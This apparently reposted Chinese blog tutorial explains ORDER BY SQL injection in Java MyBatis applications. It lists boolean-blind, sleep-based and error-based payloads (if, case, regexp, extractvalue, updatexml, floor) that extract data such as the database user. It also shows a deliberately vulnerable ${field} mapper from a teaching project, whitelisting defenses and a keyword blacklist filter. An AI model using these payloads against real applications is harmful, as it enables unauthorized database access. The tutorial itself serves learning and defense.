本文首发freebuf，也可移步：关于Java中order by注入详解

起因

因为最近在准备面试的东西，在一天下午面试成都某家公司的时候被问到java的order by注入，当时因为懵了并没有做很好的回答…其实还是因为太过急躁在之前学习SQL注入时并没有深入到代码层面理解各个类型漏洞，造成根基并没有打牢。实际上针对不同类型的漏洞在源码层面有很大的不同，例如php中联合查询一定是存在回显位，即将数据库中查询结果展示；盲注大概率是进行了if判断；报错注入一般存在这类函数 print_r(mysql_error())(java中catch (Exception e) { return e.toString(); })等。

order by 注入方式

直接从mybatis框架的注入说起吧

在mybatis中的，使用#包裹的字段在内部进行了预编译处理，而$并没有使用预编译，也就是原生jdbc中
prepareStatement和Statement的区别。
关于order by，当注入点在后面时，是不能连接union的，例如：

select * from users order by user; 

在SQL中是不允许union直接跟在order by后面的，所以我们可以考虑使用盲注或报错注入。

利用盲注，也就是看返回值

已知字段

使用if条件句，if(1=1,id,user),if函数三个占位，1=1为表达式，也是后续注入主要利用的地方，表达式为真返回以id排序，为假返回user排序，而真假返回的查询结果是不一样的，所以可以通过这种方式注入。

其他的利用方式还有：

select * from users order by (case when (1=1) then user else id end ); //根据user排序
select * from users order by (case when (1=2) then user else id end ); //根据id排序
select * from users order by ifnull(null,user);
select * from users order by ifnull(null,id);
select * from users order by rand(1=1);
select * from users order by rand(1=2);

未知字段

在实际注入时，可能字段并不是我们提前知道的，那么可能就需要用另外的方式了。

同样以if()为例，只需要改下第三个参数使其查询报错select 1 union select 2，第二个参数也需要改为1(true)，之前因为没改导致运行时mysql崩了，甚至连mysql服务都给我干关闭了。。。

同样的方式还有：

select * from users order by if(1=1,1,(select 1 from information_schema.tables)); 
select * from users order by if(1=2,1,(select 1 from information_schema.tables));
select * from users order by (select 1 regexp if(1=1,1,0x00)); //正则表达式
select * from users order by (select 1 regexp if(1=2,1,0x00));  //0x00为空导致报错
select * from users order by (select if((ascii(substr(current,1,1))<0),1,sleep(2)) from (select user() as current) as tb1);  //利用sleep延时注入

在使用sleep延时注入需要注意不能直接简单sleep(x)，这样实际延时的时间将会是x乘以表内列的字段数量，例如我这里延时2*3秒。

利用报错函数

报错注入的条件是需要服务端代码中将SQL报错语句输出。
主要是利用extractvalue和updatexml

select * from users order by extractvalue(1,(select concat(0x7e,user()))); 
select * from users order by updatexml(1,(select concat(0x7e,user())),1);
select * from users order by (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); //floor报错注入，Duplicate key

安全问题

在mybatis中无论是使用xml或者注解编写SQL语句时，都是推荐结合#使用，因为内部使用了预编译，然而在一些特殊场景我们并不能这般，如在like后直接使用#包裹变量在运行时是会报错的，推荐的写法是concat('%',#{q},'%')。
这里推荐一个安全检测插件：MomoSec 可以初步检测一些安全问题

order by 在mybatis中同样不能直接使用#包裹，因为order by后跟的往往是字段名，而预编译在对一个参数使用时会加上引号,字段名是不能加引号的,否则会失去本来的意思；如 order by id ==> order by ‘id’ ，这也是为什么在排序的位置通常会存在sql注入。
关于order by 并没有很好的解决方案，所以预编译也不是完全安全的，在防御时还应使用其他方法做好防御，如waf和filter。

案例

代码直接使用的这个项目：Hello-Java-Sec

@GetMapping("/vul/order")
    public List<User> orderBy(String field, String sort) {
        log.info("[vul] mybaits: order by " + field + " " + sort);
        return userMapper.orderBy(field, sort);

UserMapper.xml

<select id="orderBy" resultType="com.best.hello.entity.User">
        select *
        from users
        order by ${field} ${sort}
</select>

因为未知列名，使用盲注：结果输出不同


常规的盲注了，python写个脚本即可

上面使用的盲注，springboot项目是默认有报错页面的，所以报错注入也可以

那么代码中是如何防御的呢？
实际上他是在xml中固定化了传入参数，id或user，也就没办法注入了。

但是有个问题，当表内字段很大时我们不可能写很多复杂的匹配判断，所以可以写个filter或waf函数,过滤掉危险字符，所有的用户输入都经过函数过滤也是一种不错的方式。

/**
    * SQL注入检测
    */
   public static boolean checkSql(String content) {
       String[] black_list = {"'", ";", "--", "+", ",", "%", "=", ">", "<", "*", "(", ")", "and", "or", "exec", "insert", "select", "delete", "update", "count", "drop", "chr", "mid", "master", "truncate", "char", "declare"};
       for (String s : black_list) {
           if (content.toLowerCase().contains(s)) {
               return true;
           }
       }
       return false;
   }

小结

order by注入一直是容易被面试官问到的点，我也是简单做了总结。
在后期的学习中还是需要多跟着代码走，一味的复现靶场环境好像学到的东西真的挺少的。